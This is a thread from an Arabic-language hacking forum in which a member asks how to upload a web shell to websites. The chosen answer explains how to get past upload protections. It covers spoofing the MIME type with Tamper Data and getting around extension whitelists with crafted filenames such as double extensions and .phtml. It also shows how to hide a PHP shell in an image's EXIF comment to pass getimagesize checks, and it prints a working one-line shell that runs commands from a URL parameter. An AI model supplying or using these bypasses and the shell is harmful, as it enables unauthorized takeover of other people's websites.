التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام

		:: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب
[مساعده] اريد طريقة رفع شل جديدة

LinkBack

أدوات الموضوع

انواع عرض الموضوع

10-03-2014, 06:31 PM

رقم المشاركة : 1 (permalink)

معلومات العضو

serial killer

إحصائية العضو

serial killer غير متواجد حالياً

إحصائية الترشيح

عدد النقاط : 16
serial killer is on a distinguished road

مجاب: رد: اريد طريقة رفع شل جديدة

ارسل اللوحة على الخاص

المصدر: :: vBspiders Professional Network ::

Vspan style="font-weight: bold; color: #006400;"Cl[hf:VLspanC v]: hvd] 'vdrm vtu ag []d]m

أفضل جواب - كتبه hisokaosomaki

عند رفع الشل عادة المواقع تكون لديها تدابير امنية تمنع دالك
و كل إجراء أمني لديه طريقة تخطي المناسبة لدالك سوف اشرح طريقة الرفع حسب الحماية المستعملة

الحماية حسب نوع الملف

كود PHP:

  if($_FILES['userfile']['type'] != "image/jpg")

لتخطي هده الحماية نستعمل تامبر داتا

الحماية باستخدام اللائحة البيضاء
وهو جدول في ملف البي اش بي يحتوي على الامتدادات المسموحة

كود PHP:

  $valid_file_extensions = array(".jpg", ".jpeg", ".gif", ".png");

لتخطي هادا النوع من الحمايات نتلاعب ياسم الملف
مثلا

اقتباس


	shell.jpg.php shell.jpg.PhP shell.php.xxxjpg shell.php;.jpg shell.php%0delete0.jpg shell.php.test .phtml .php3/.php4/.php5

الحماية باستخدام الدوال الخاصة بالصور
في هده الحالة المبرمج يستعمل دالة خاصة بالصور مثلا الدالة التي ترجع قياسات الصورة للتاكد ان الملف الدي تم رفعه هو فعلا صورة

كود PHP:

  $imageinfo = getimagesize($_FILES['userfile']['tmp_name']);

في هده الحالة كل الطرق السابقة سوف تفشل و الحل الوحيد هو رفع صورة حقيقيقة
لذالك نذهب الى برنامج الرسام و ننشئ صورة صغيرة بحجم الايقونة ونحفظها في سطح المكتب
نحمل برنامج لتعديل الميتا داتا الخاص بالصورة مثل GIMPاو exif pilot
انا سوف اشرح exif pilot
http://exifpilot.com/ الموقع الرسمي للبرنامج
بعد التثبيث نفتح الصورة بالبرامج نضع الكود الدي يمثل الشل المجهري في التعليق

كود PHP:

<?if($_GET['lol']){echo"<pre>".shell_exec($_GET["lol"]);}?>